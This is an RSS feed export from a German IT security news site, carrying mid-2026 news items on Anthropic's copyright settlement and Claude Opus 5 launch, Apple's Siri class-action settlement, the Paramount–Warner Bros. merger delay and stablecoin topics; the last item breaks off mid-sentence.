<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=what+stablecoin+settlement%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Thu, 30 Jul 2026 01:13:12 +0200</lastBuildDate>
<pubDate>Thu, 30 Jul 2026 01:13:12 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=what+stablecoin+settlement%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=what+stablecoin+settlement%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Anthropic pays $1.5B to settle contentious copyright case]]></title>
<description><![CDATA[A US federal court has approved Anthropic’s $1.5 billion settlement in a class-action lawsuit in which authors accused the AI company of using their books without permission to train the AI model Claude. This is the largest such settlement to date in a US copyright case, according to Reuters.



...]]></description>
<link>https://tsecurity.de/de/3694775/ai-nachrichten/anthropic-pays-15b-to-settle-contentious-copyright-case/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694775/ai-nachrichten/anthropic-pays-15b-to-settle-contentious-copyright-case/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:11 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A US federal court has approved Anthropic’s $1.5 billion settlement in a class-action lawsuit in which authors <a href="https://www.computerworld.com/article/3489680/anthropic-sued-by-authors-over-alleged-misuse-of-copyrighted-works-for-ai-training.html" data-type="link" data-id="https://www.computerworld.com/article/3489680/anthropic-sued-by-authors-over-alleged-misuse-of-copyrighted-works-for-ai-training.html">accused the AI company of using their books without permission</a> to train the AI model Claude. This is the largest such settlement to date in a US copyright case, <a href="https://www.reuters.com/world/us-judge-approves-anthropics-15-billion-settlement-copyright-lawsuit-2026-07-20/" target="_blank" rel="noreferrer noopener">according to Reuters</a>.</p>



<p class="wp-block-paragraph">The dispute is one of several legal cases in which copyright holders sued AI companies over how large language models (LLMs) were trained, and it is the first major AI-related copyright dispute in the US to be resolved through a settlement.</p>



<p class="wp-block-paragraph">A judge had previously ruled that the actual training of AI models using books falls under the “fair use” doctrine in US copyright law. But Anthropic was found to have violated the law by storing more than 7 million pirated books in a central library, regardless of whether they were later used for AI training or not.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Harry Potter publisher to receive millions in Anthropic copyright settlement]]></title>
<description><![CDATA[Bloomsbury has 14,087 titles listed in agreement between AI startup and authors over use of their work The publisher of Harry Potter has received a multimillion-pound payout as a beneficiary of a $1.5bn (£1.12bn) copyright settlement between the AI startup Anthropic and thousands of authors over ...]]></description>
<link>https://tsecurity.de/de/3694761/ai-nachrichten/harry-potter-publisher-to-receive-millions-in-anthropic-copyright-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694761/ai-nachrichten/harry-potter-publisher-to-receive-millions-in-anthropic-copyright-settlement/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:01 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Bloomsbury has 14,087 titles listed in agreement between AI startup and authors over use of their work </p><p>The publisher of Harry Potter has received a multimillion-pound payout as a beneficiary of a $1.5bn (£1.12bn) copyright settlement between the AI startup Anthropic and thousands of authors over the use of their protected work to power chatbots.</p><p>Bloomsbury, which is home to the bestselling novelists Sarah J Maas and Susanna Clarke as well as JK Rowling, said it had 14,087 titles listed within the settlement, with a proposed compensation of about $3,000 a title.</p> <a href="https://www.theguardian.com/technology/2026/jul/22/bloomsbury-book-publisher-anthropic-copyright-settlement">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[A7A5: Stablecoin als geopolitische kriminelle Infrastruktur - Rechtsanwalt Ferner]]></title>
<description><![CDATA[Außenwirtschaftsstrafrecht, Blockchain & Kryptowährungen, Cybercrime Blog, eSpionage & Wirtschaftsspionage: Der rubelgebundene Stablecoin A7A5 ist ...]]></description>
<link>https://tsecurity.de/de/3694453/it-security-nachrichten/a7a5-stablecoin-als-geopolitische-kriminelle-infrastruktur-rechtsanwalt-ferner/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694453/it-security-nachrichten/a7a5-stablecoin-als-geopolitische-kriminelle-infrastruktur-rechtsanwalt-ferner/</guid>
<pubDate>Sat, 25 Jul 2026 19:00:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Außenwirtschaftsstrafrecht, Blockchain &amp; Kryptowährungen, <b>Cybercrime</b> Blog, eSpionage &amp; Wirtschaftsspionage: Der rubelgebundene Stablecoin A7A5 ist ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram Trading Bot Banana Gun Goes Live on Stable Chain]]></title>
<description><![CDATA[Banana Gun’s Telegram trading bot went live on Stable, the stablecoin Layer 1 backed by Bitfinex, on 24 July 2026, and gas on that chain is paid in USDT rather than a volatile native token. If you have ever watched a sniper bot fail because a separate gas token ran dry mid trade, this launch […]
...]]></description>
<link>https://tsecurity.de/de/3694407/it-security-nachrichten/telegram-trading-bot-banana-gun-goes-live-on-stable-chain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694407/it-security-nachrichten/telegram-trading-bot-banana-gun-goes-live-on-stable-chain/</guid>
<pubDate>Sat, 25 Jul 2026 18:58:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Banana Gun’s Telegram trading bot went live on Stable, the stablecoin Layer 1 backed by Bitfinex, on 24 July 2026, and gas on that chain is paid in USDT rather than a volatile native token. If you have ever watched a sniper bot fail because a separate gas token ran dry mid trade, this launch […]</p>
<p>The post <a href="https://secureblitz.com/telegram-trading-bot-banana-gun-goes-live-on-stable-chain/">Telegram Trading Bot Banana Gun Goes Live on Stable Chain</a> appeared first on <a href="https://secureblitz.com/">SecureBlitz Cybersecurity</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Paramount Agrees to Postpone Warner Bros. Merger Until June 2027]]></title>
<description><![CDATA[Paramount Skydance has agreed to postpone its $111 billion Warner Bros. Discovery merger until five days after an antitrust trial or June 1, 2027, whichever comes first. The agreement with a 12-state coalition led by California effectively shelves the deal for months while states argue it would r...]]></description>
<link>https://tsecurity.de/de/3692726/it-security-nachrichten/paramount-agrees-to-postpone-warner-bros-merger-until-june-2027/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692726/it-security-nachrichten/paramount-agrees-to-postpone-warner-bros-merger-until-june-2027/</guid>
<pubDate>Sat, 25 Jul 2026 01:07:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Paramount Skydance has agreed to postpone its $111 billion Warner Bros. Discovery merger until five days after an antitrust trial or June 1, 2027, whichever comes first. The agreement with a 12-state coalition led by California effectively shelves the deal for months while states argue it would reduce competition in cable and theatrical markets. Variety reports: Paramount had been keen to close the deal before Sept. 30, when it will begin to incur a $7-million-a-day "ticking fee" to be paid to Warner Bros. investors. The agreement is a tacit acknowledgement that that will not happen, barring a settlement with the states. Paramount previously sought a three-day hearing on the injunction motion in late August, hoping to win the judge's blessing to close the deal sometime in early September. But the states resisted that idea, saying they would need more time to take discovery and prepare for a full trial on the merits. The states were due to file their injunction motion on Thursday night, but held off as the two sides held discussions on a path forward. In a statement, the company said the agreement is a "significant win."
 
"Today's agreement is a significant win because the result is exactly what we have sought from the outset: a direct path to a trial based on the evidence," a Paramount spokesperson said. "This is the fastest and clearest way to prove that this transaction is good for competition, good for consumers, and good for creators, a conclusion dozens of competition authorities around the world have already reached. Plaintiffs' market definitions bear no relationship to the realities of today's marketplace and cannot withstand scrutiny. We look forward to proving our case at trial."
 
A hearing was scheduled for Aug. 3 in federal court in Oakland, at which point the two sides were expected to argue over the injunction motion. The two sides agreed to cancel that hearing. U.S. District Judge Araceli Martinez-Olguin approved the joint stipulation on Friday afternoon, about an hour after it was entered. The Writers Guild of America filed its own motion for an injunction earlier this week, which was also set to be heard on Aug. 3. That motion has been withdrawn, as Paramount has effectively conceded that it will not close the deal until a determination of the merits of the antitrust claims. The parties also agreed to submit a joint stipulation by July 31 on their respective positions on trial scheduling. The states previously proposed to hold the trial in April 2027.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Paramount+Agrees+to+Postpone+Warner+Bros.+Merger+Until+June+2027%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F24%2F2235232%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F24%2F2235232%2Fparamount-agrees-to-postpone-warner-bros-merger-until-june-2027%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/07/24/2235232/paramount-agrees-to-postpone-warner-bros-merger-until-june-2027?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hoping to Collect on Apple’s $250M AI iPhone Settlement? You’ll Have to Wait a Year]]></title>
<description><![CDATA[The company will pay some iPhone owners to settle a lawsuit, but following a development last week, it’s clear the legal machine grinds slowly.]]></description>
<link>https://tsecurity.de/de/3692637/it-nachrichten/hoping-to-collect-on-apples-250m-ai-iphone-settlement-youll-have-to-wait-a-year/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692637/it-nachrichten/hoping-to-collect-on-apples-250m-ai-iphone-settlement-youll-have-to-wait-a-year/</guid>
<pubDate>Fri, 24 Jul 2026 23:48:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The company will pay some iPhone owners to settle a lawsuit, but following a development last week, it’s clear the legal machine grinds slowly.]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic launches Claude Opus 5, a cheaper AI model for coding, agents and enterprise workflows]]></title>
<description><![CDATA[Anthropic released Claude Opus 5 on Friday, a model the company says delivers nearly all the intelligence of its top-of-the-line Claude Fable 5 at half the cost — a launch that signals how the AI race is shifting from raw capability to the economics of daily use.The model, available immediately o...]]></description>
<link>https://tsecurity.de/de/3692246/it-nachrichten/anthropic-launches-claude-opus-5-a-cheaper-ai-model-for-coding-agents-and-enterprise-workflows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692246/it-nachrichten/anthropic-launches-claude-opus-5-a-cheaper-ai-model-for-coding-agents-and-enterprise-workflows/</guid>
<pubDate>Fri, 24 Jul 2026 20:10:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.anthropic.com/">Anthropic</a> released Claude <a href="http://anthropic.com/news/claude-opus-5">Opus 5</a> on Friday, a model the company says delivers nearly all the intelligence of its top-of-the-line Claude <a href="https://www.anthropic.com/claude/fable">Fable 5</a> at half the cost — a launch that signals how the AI race is shifting from raw capability to the economics of daily use.</p><p>The model, available immediately on all of Anthropic's platforms, is priced at $5 per million input tokens and $25 per million output tokens, unchanged from its predecessor, <a href="https://www.anthropic.com/news/claude-opus-4-8">Opus 4.8</a>. It becomes the new default model on <a href="https://support.claude.com/en/articles/11049741-what-is-the-max-plan">Claude Max</a>, Anthropic's premium consumer tier, and the strongest model available on <a href="https://support.claude.com/en/articles/8325606-what-is-the-pro-plan">Claude Pro</a>.</p><p>The positioning is deliberate. Anthropic is not claiming <a href="http://anthropic.com/news/claude-opus-5">Opus 5 </a>is its smartest model — that distinction still belongs to <a href="https://www.anthropic.com/claude/fable">Fable 5</a>, and rival systems retain an edge in certain domains. Instead, the company is making a subtler argument that may matter more to enterprise buyers: that the most economically important AI work happens in a middle band of difficulty, where near-frontier intelligence delivered efficiently and cheaply beats frontier intelligence delivered expensively.</p><p>"Opus 5 as your daily driver, the model you hand complex work to and review when it's done," an Anthropic spokesperson said in an interview with VentureBeat, describing how the company's lineup now stratifies. "Fable 5 for your most ambitious work, the days-long autonomous projects nothing could take on before... Sonnet 5 for work you run at scale, where speed and cost per call decide what ships. Haiku 4.5 for subagents and instant answers."</p><h2><b>How Claude Opus 5 benchmark results stack up against Fable 5 and rival AI models</b></h2><p>On paper, the results are striking. Anthropic says <a href="http://anthropic.com/news/claude-opus-5">Opus 5</a> sets new state-of-the-art marks on coding and knowledge-work evaluations including <a href="https://www.frontierbench.ai/announcement">Frontier-Bench</a> and <a href="https://artificialanalysis.ai/evaluations/gdpval-aa">GDPval-AA</a>. On <a href="https://www.frontierbench.ai/announcement">Frontier-Bench v0.1</a>, an agentic terminal coding benchmark, Opus 5 scores 43.3 percent — more than double Opus 4.8's 18.7 percent and well ahead of Fable 5's 33.7 percent — at a lower cost per task, according to the company. On <a href="https://arcprize.org/arc-agi/3">ARC-AGI 3</a>, an evaluation of novel problem-solving, Anthropic reports Opus 5 scored three times as high as the next best model. On <a href="https://github.com/xlang-ai/OSWorld-V2">OSWorld 2.0</a>, a computer-use benchmark, the company says the model surpasses Fable 5's best result at just over a third of the cost.</p><p>The numbers come with honest caveats that are themselves notable in an industry prone to superlatives. Anthropic acknowledges <a href="http://anthropic.com/news/claude-opus-5">Opus 5</a> remains behind <a href="https://www.anthropic.com/claude/mythos">Mythos 5</a>, a competing model, on cybersecurity tasks and biology research, and an OpenAI-family model still leads on one agentic coding benchmark.</p><p>The more revealing caveat came from Anthropic itself, when asked where <a href="http://anthropic.com/news/claude-opus-5">Opus 5</a> still falls short of <a href="https://www.anthropic.com/claude/fable">Fable 5</a>. The spokesperson's answer amounted to a candid admission about what benchmarks do and don't capture.</p><p>"The evals where Opus 5 wins are bounded tasks with a specific outcome, which is where it's strongest. What those evals don't measure is duration," the spokesperson told VentureBeat. "One way to put it: Opus 5 is the best tool for the jobs benchmarks can see, and Fable 5 is what you reach for when the job outruns the benchmark."</p><p><a href="https://www.anthropic.com/claude/fable">Fable 5</a>, by contrast, "is for the longest, most autonomous jobs, where the model has to stay coherent across many connected steps over hours or days with dense source material," the spokesperson said, advising customers to "run both on a representative workload, one bounded task and one long-horizon job." That framing — bounded tasks versus long-horizon autonomy — may become the defining axis of model differentiation in 2026, as benchmarks saturate and the hardest remaining problems involve sustained, multi-day agentic work rather than discrete puzzles.</p><h2><b>Why token efficiency is becoming the real battleground for enterprise AI spending</b></h2><p>Threaded through the launch is a theme Anthropic clearly wants buyers to absorb: <a href="http://anthropic.com/news/claude-opus-5">Opus 5</a> doesn't just score well, it scores well per dollar. The model ships with an adjustable "effort" setting that lets customers trade intelligence for speed and token savings, and Anthropic's charts emphasize performance at a given cost rather than peak performance alone.</p><p>Early customers echoed the point with unusual specificity. Harvey, the legal AI company, said Opus 5 achieved similar performance to Opus 4.8's maximum-reasoning mode "while generating 26% fewer tokens on average," according to Niko Grupen, its head of applied research. Richard Pham of Fundamental Research Lab said that on hard financial-modeling tasks, the model averaged nine percentage points higher accuracy "while using roughly one-third fewer turns and tool calls and 60% less time."</p><p>Wade Foster, chief executive of Zapier, said Opus 5 topped his company's AutomationBench leaderboard "without spending more tokens than prior Claude models," running a full churn-prevention workflow from start to finish. "Previous models didn't pass; Opus 5 hit 100%," he said. Scott Wu, chief executive of Cognition, the company behind the Devin coding agent, said that on FrontierCode 1.1, "Claude Opus 5 approaches Fable-level performance at half the cost," with particular strength in debugging and root-cause analysis.</p><p>The efficiency emphasis reflects commercial reality. Enterprise AI spending is no longer experimental, and inference costs — the price of actually running these models at scale — have become a board-level line item. </p><p>Anthropic's business skews heavily toward API and enterprise usage; according to a February 2026 analysis by <a href="https://research.contrary.com/company/anthropic">Contrary Research</a>, Claude held roughly 40 percent of the enterprise large language model market by usage as of late 2025, and Claude Code alone had reached about $1 billion in annualized revenue. For a company whose customers pay by the token, a model that does more with fewer tokens is not a nice-to-have. It is the product.</p><h2><b>Self-verifying AI agents and what they mean for the hidden costs of automation</b></h2><p>Beyond the numbers, Anthropic is selling a behavioral story: that <a href="http://anthropic.com/news/claude-opus-5">Opus 5</a> verifies its work and iterates until it succeeds. The company offered several examples from testing that read like small parables of machine stubbornness.</p><p>In one <a href="https://www.frontierbench.ai/announcement">Frontier-Bench</a> task, the model was asked to reconstruct a machine part as a 3D CAD model from a drawing it was intentionally given no way to view. Rather than fail, Anthropic says, Opus 5 wrote its own computer vision pipeline to extract the geometry from raw pixels — and did so repeatedly, while no competing model solved the task in five attempts. In another case, given a real bug in a popular open-source package manager, the model found the root cause and fixed an edge case the community's own patch had missed; a competing model patched only the symptom and declared victory. An engineer at a trading firm, the company says, used Opus 5 to build a market data feed for a new exchange in a single session and, finding no live feed to validate against, watched the model build its own test harness to check its parsing code.</p><p>Customers described similar behavior in the wild. Cristian Rivera, a staff software engineer at Stripe, said he gave the model "a chief-of-staff role over my dev environments" for a weekend: "it built its own monitor, drove each box, and pulled me in only for the judgment calls."</p><p>This is the capability enterprises actually care about, and it is worth dwelling on why. The gap between a model that produces plausible output and one that verifies its output is the gap between a demo and a deployable system. Most of the hidden cost of enterprise AI today is human review — engineers checking the machine's work. A model that reliably checks its own work compresses that cost, which is precisely why customers keep citing fewer turns, fewer passes, and less time rather than higher raw scores.</p><h2><b>Inside Anthropic's safety strategy: capability gaps, classifiers, and model fallbacks</b></h2><p>The launch also showcases Anthropic's increasingly intricate approach to safety — one that now involves deliberately not teaching its models certain skills. The company says its automated behavioral audit found Opus 5 to be its most aligned model to date, scoring 2.3 on overall misaligned behavior, lower than <a href="https://www.anthropic.com/news/claude-opus-4-8">Opus 4.8</a>, <a href="https://www.anthropic.com/news/claude-sonnet-5">Sonnet 5</a>, or <a href="https://www.anthropic.com/claude/fable">Fable 5</a>, with the lowest rates of deceptive behavior and the least susceptibility to being tricked into misuse.</p><p>On the capability side, Anthropic says it intentionally avoided training <a href="http://anthropic.com/news/claude-opus-5">Opus 5</a> on cyber tasks, as it did with Opus 4.8. The model improved on them anyway — a side effect of general capability gains — and now nearly matches Mythos 5 at finding software vulnerabilities. But it remains far behind at exploiting them: on Anthropic's OSS-Fuzz evaluation, Opus 5 identified vulnerabilities at a 79.4 percent rate, close to Mythos 5's 80 percent, but succeeded at developing exploits in only 4 challenges versus Mythos 5's 13. That asymmetry — strong at defense-relevant discovery, weak at offense-relevant exploitation — appears to be by design, and the safeguards follow the same logic. Anthropic expects Opus 5's cyber classifiers to intervene about 85 percent less often than Fable 5's.</p><p>When a classifier does trigger, requests in <a href="http://claude.ai/">Claude.ai</a>, <a href="https://code.claude.com/docs/en/overview">Claude Code</a>, and <a href="https://claude.com/product/cowork">Claude Cowork</a> fall back to <a href="https://www.anthropic.com/news/claude-opus-4-8">Opus 4.8</a> by default — raising an obvious question: if a request is too risky for one model, why is it acceptable for another? "The model it falls back to has lower capability levels making the risk of harmful use lower as well," the spokesperson said, adding that "there is a message that lets the user know when this occurs and is visible in the chat."</p><p>The logic is defensible, but it reveals how AI safety actually works in 2026: risk is not a property of the question alone, but of the question multiplied by the capability of the system answering it. On biology, the calculus runs the other way. Opus 5 is now Anthropic's most capable generally available model for scientific research — scoring 10.2 percentage points higher than Opus 4.8 on the company's internal chemistry benchmark — though the spokesperson acknowledged that "Mythos 5 remains the stronger model for long-horizon, open-ended work like autonomous drug design campaigns."</p><h2><b>The business stakes behind the launch: a $380 billion valuation and massive compute bets</b></h2><p>The launch lands at a moment of extraordinary commercial momentum — and extraordinary obligations — for Anthropic. Reuters reported in February that the company was valued at <a href="https://www.reuters.com/technology/anthropic-valued-380-billion-latest-funding-round-2026-02-12/">roughly $380 billion</a> in its latest funding round, following a period in which, per Contrary Research's analysis, its annualized revenue climbed from about $1 billion at the end of 2024 to a projected $9 billion by the end of 2025, with internal targets reportedly <a href="https://research.contrary.com/company/anthropic">reaching $20 to $26 billion for 2026</a>. Those targets are underwritten by enormous infrastructure commitments, including a <a href="https://www.anthropic.com/news/microsoft-nvidia-anthropic-announce-strategic-partnerships">reported $30 billion Azure compute deal</a> alongside arrangements with Google Cloud and Nvidia — spending that only pencils out if enterprises keep expanding usage.</p><p>That is the context in which Opus 5's pricing strategy makes sense. Holding the price at Opus 4.8 levels while roughly doubling performance on key agentic benchmarks is effectively a steep price cut per unit of capability, designed to widen the funnel of workloads that are economical to automate. Every task that was marginal at Opus 4.8's cost-per-success becomes viable at Opus 5's — and every viable task is recurring token revenue.</p><p>The regulatory backdrop has grown more complex as well. A U.S. judge gave final approval this week to <a href="https://www.reuters.com/world/us-judge-approves-anthropics-15-billion-settlement-copyright-lawsuit-2026-07-20/">Anthropic's $1.5 billion copyright settlement with book authors</a>, Reuters reported, closing a chapter of litigation over the company's early training data. And in June, Reuters, citing Axios, reported that the U.S. government had moved to <a href="https://www.reuters.com/technology/us-blocks-foreign-access-anthropics-most-advanced-ai-models-axios-reports-2026-06-13/">block foreign access </a>to Anthropic's most advanced models — a reminder that frontier AI is now entangled with export policy in ways that shape which customers can buy what.</p><p>Also shipping Friday: a Fast mode running at roughly 2.5 times default speed at twice the base price, automatic fallback routing on the API, and mid-conversation tool changes that no longer invalidate the prompt cache — a small feature that agent developers may appreciate more than any benchmark. Consistent with prior Opus models, Opus 5 carries no data retention requirements for general access, a point the spokesperson flagged unprompted for customers with "a hard zero data retention requirement." Developers can access the model as claude-opus-5 on the <a href="https://platform.claude.com/login?returnTo=%2F%3F">Claude API</a> starting today.</p><p>Two questions will determine whether the bet pays off: whether <a href="http://anthropic.com/news/claude-opus-5">Opus 5's efficiency claims </a>survive contact with production workloads at scale, and whether enterprises embrace a world where safety classifiers, not users, sometimes decide which model answers. But the deeper message of Friday's launch is that the AI industry's center of gravity has moved. For three years, the labs competed on what their best model could do on its best day. With Opus 5, Anthropic is competing on something less glamorous and far more lucrative: what a very good model can do every day, for half the price. In a market where the frontier keeps moving, Anthropic is wagering that the real fortune lies just behind it.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s $250M AI iPhone Settlement Moves Forward. Find Out If You’re Eligible to Collect]]></title>
<description><![CDATA[The company will pay iPhone owners to settle a lawsuit concerning missing and delayed AI features.]]></description>
<link>https://tsecurity.de/de/3692217/it-nachrichten/apples-250m-ai-iphone-settlement-moves-forward-find-out-if-youre-eligible-to-collect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692217/it-nachrichten/apples-250m-ai-iphone-settlement-moves-forward-find-out-if-youre-eligible-to-collect/</guid>
<pubDate>Fri, 24 Jul 2026 19:50:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The company will pay iPhone owners to settle a lawsuit concerning missing and delayed AI features.]]></content:encoded>
</item>
<item>
<title><![CDATA[$250 million Siri delay settlement approved: Apple to pay select iPhone buyers]]></title>
<description><![CDATA[A U.S. judge has given preliminary approval to Apple’s $250 million settlement of a class-action lawsuit over the delayed launch of advanced…
The post $250 million Siri delay settlement approved: Apple to pay select iPhone buyers appeared first on MacDailyNews.]]></description>
<link>https://tsecurity.de/de/3692201/ios-mac-os/250-million-siri-delay-settlement-approved-apple-to-pay-select-iphone-buyers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692201/ios-mac-os/250-million-siri-delay-settlement-approved-apple-to-pay-select-iphone-buyers/</guid>
<pubDate>Fri, 24 Jul 2026 19:37:07 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A U.S. judge has given preliminary approval to Apple’s $250 million settlement of a class-action lawsuit over the delayed launch of advanced…</p>
<p>The post <a href="https://macdailynews.com/2026/07/24/250-million-siri-delay-settlement-approved-apple-to-pay-select-iphone-buyers/">$250 million Siri delay settlement approved: Apple to pay select iPhone buyers</a> appeared first on <a href="https://macdailynews.com/">MacDailyNews</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s $250 Million Siri Settlement Approved, iPhone Users Could Get Up to $95]]></title>
<description><![CDATA[Apple’s $250 million settlement over the delayed launch of its new Siri features has received preliminary court approval, bringing eligible iPhone owners closer to a possible payout of up to $95. The settlement website has not launched yet, so customers do not need to submit any forms or take act...]]></description>
<link>https://tsecurity.de/de/3692182/ios-mac-os/apples-250-million-siri-settlement-approved-iphone-users-could-get-up-to-95/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692182/ios-mac-os/apples-250-million-siri-settlement-approved-iphone-users-could-get-up-to-95/</guid>
<pubDate>Fri, 24 Jul 2026 19:20:12 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple’s $250 million settlement over the delayed launch of its new Siri features has received preliminary court approval, bringing eligible iPhone owners closer to a possible payout of up to $95. The settlement website has not launched yet, so customers do not need to submit any forms or take action at this stage.



The lawsuit followed Apple’s decision to delay several Siri features that it had promoted alongside Apple Intelligence in June 2024. These features included personal context awareness, on-screen understanding, and deeper controls inside supported apps.



Apple used product presentations, its website, and a television advertisement featuring Bella Ramsey to promote the new Siri experience. However, the company delayed the personalised Siri upgrade in March 2025, which led customers to file a class action lawsuit over alleged false advertising.



Who qualifies for the Apple Siri settlement?



Eligible users must live in the United States and must have purchased one of the following iPhone models between June 10, 2024, and March 29, 2025:




iPhone 15 Pro



iPhone 15 Pro Max



iPhone 16



iPhone 16e



iPhone 16 Plus



iPhone 16 Pro



iPhone 16 Pro Max




Customers will likely need to provide purchase details, a serial number, or other device information when submitting a claim. The final requirements will appear on the official settlement website once it goes live.



Each approved claim will receive an estimated payment of $25 per eligible device. However, the payout can rise to as much as $95 if fewer people submit valid claims than expected.



According to the July 17 court document, eligible customers should receive email notices within about 45 days of preliminary approval. Customers who do not receive an email can still submit a claim if they meet the eligibility requirements.



Apple announced its revamped Siri system at WWDC 2026, and the assistant is now available through the iOS 27 developer beta. Apple plans to release iOS 27 publicly in September for the iPhone 15 Pro and newer models.]]></content:encoded>
</item>
<item>
<title><![CDATA[Judge approves Apple's $250 million settlement offer over Siri lawsuit]]></title>
<description><![CDATA[A lawsuit over Apple's failure to deliver Apple Intelligence and Siri features is moving closer to a conclusion as a judge has provisionally approved the company's settlement offer.Apple has settled a class-action lawsuit over its delayed Siri features.The class action suit filed in 2025 alleged ...]]></description>
<link>https://tsecurity.de/de/3691966/ios-mac-os/judge-approves-apples-250-million-settlement-offer-over-siri-lawsuit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691966/ios-mac-os/judge-approves-apples-250-million-settlement-offer-over-siri-lawsuit/</guid>
<pubDate>Fri, 24 Jul 2026 17:50:14 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A lawsuit over Apple's failure to deliver <a href="https://appleinsider.com/inside/apple-intelligence" title="Apple Intelligence" data-kpt="1">Apple Intelligence</a> and Siri features is moving closer to a conclusion as a judge has provisionally approved the company's settlement offer.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67552-142286-66856-140246-Apple-Intelligence-lawsuit-gavel-xl.jpg" alt="Wooden judge's gavel resting on a block, with an Apple logo surrounded by a decorative atomic-style pattern engraved on the gavel head against a neutral gray background"><br><span>Apple has settled a class-action lawsuit over its delayed Siri features.</span></div><br>The class action suit <a href="https://appleinsider.com/articles/25/07/29/apples-delayed-siri-update-spawns-another-securities-lawsuit">filed in 2025</a> alleged that people had bought new <a href="https://appleinsider.com/inside/iphone" title="iPhone" data-kpt="1">iPhones</a> expressly because of Apple's promoting of Apple Intelligence features that it then did not deliver. Apple admitted in March 2025 that the new Siri features <a href="https://appleinsider.com/articles/25/03/07/apple-confirms-that-apple-intelligence-siri-features-are-taking-longer-than-expected">were delayed</a>, but then in May 2025 <a href="https://appleinsider.com/articles/26/05/05/lawsuit-over-delayed-siri-features-reaches-massive-250m-settlement">offered a settlement</a>.<br><br>Apple and the parties to the class action suit agreed to a $250 million settlement, but it had to be approved. Now <a href="https://storage.courtlistener.com/recap/gov.uscourts.cand.446692/gov.uscourts.cand.446692.94.0_1.pdf">in a filing</a> in the US District Court, Northern District of California, judge 